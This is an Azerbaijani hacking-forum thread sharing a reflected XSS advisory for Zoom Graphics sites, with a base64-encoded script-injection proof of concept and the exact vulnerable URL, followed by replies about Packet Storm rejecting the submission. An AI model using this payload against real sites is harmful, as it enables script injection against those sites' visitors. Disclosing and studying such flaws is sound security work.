Bu Vulnu baku.am-da tapmışam. Düzdü Çoxu deyirdiki yani çətindir vurmaq sadəcə .php-dən ibarətdi filan. Amma sonra çox kiçik 1 yandanda bəxt demək olar araşdırma nəticəsində Vulnerable olduğun öyrəndim. MetaiZm ilə oturub dərinləşdirdik. Buyurun Vuln :
Kod:
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability
# Date : 2012-08-19
# Author : Avatar Fearless
# Official Site : http://zoom.am/
# Version : x.x.x [UnKnown]
# Tested on : Windows 7 Ultimate x32
# Original Advisory : http://thefear.in/zoomam.txt
# Contact : avatar@hiphopfan.com
# Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/
# Greet`Z To : Meta
+---------------------------------------------------------------------------------------------------------------------------------------------------+
[+] Vulnerable :
http://site.tld/l.php?l=2&h=[base64 encode]
[-] Exploit :
Firstable You Will take a XSS Code. Example : '><script>alert(1);</script>. We Have to use only quote not Double quote because if we use than script
will parse double quote. And we will encode this code to Base64 . Output : Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== So it will be like this :
http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==
It is just example
[?] About :
For More Info Contact me.
[@]
Respect To :
All My Bro*S
AA Team
MF Team
MKT Team
Sadəcə Packet Stormy nəsə vulnu qəbul eləmədi sözün düzü dediki "fix your formatting" yani nəsə səhv yazmışam dəyəndəki nəyi? dedilərki aşağıdakılara baxıb harda nəyi səhv yazdığını biləmmərik. Yəqin fərqli adminlərə rastladım zoom.am-da daha çox site var bu vulnla bağlı olan saytlar tapa bilərsiniz =) Uğurlar
bro əvvəla təbriklər.
Xss başa düşdük amma titleda open redirect yazmısan amma advisoryde heç bu haqda məlumat belə yoxdu.ola bilsin elə buna görə qəbul olunmayıb..
Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Ayda düz deyirsən bro. Nəsə open redirected -də demək olar amma tam bilmirəm.Əslində əmin deyiləmki Open redirected olsun reski düzəliş vulna və yenidən resply and send file! Special Thank`Z bro minnətdaraç =)))))
Aydınlığa görə çox sağol 1 dəfədə
Hə o tipə gələndə isə əvvəl 1-ci dəfə ele bildim var indi diqqətlət baxıram ola bilər ya yox ortada qalmışam Advisory-ni Open Redirect-siz yolladım :
Busted Formatting.. Do u used notepad?
deyə cavab verdilər cırıldım gülməydən xD Nəsə hardasa format-da səhv eləmişəm Təşəkkürlər 1 daha
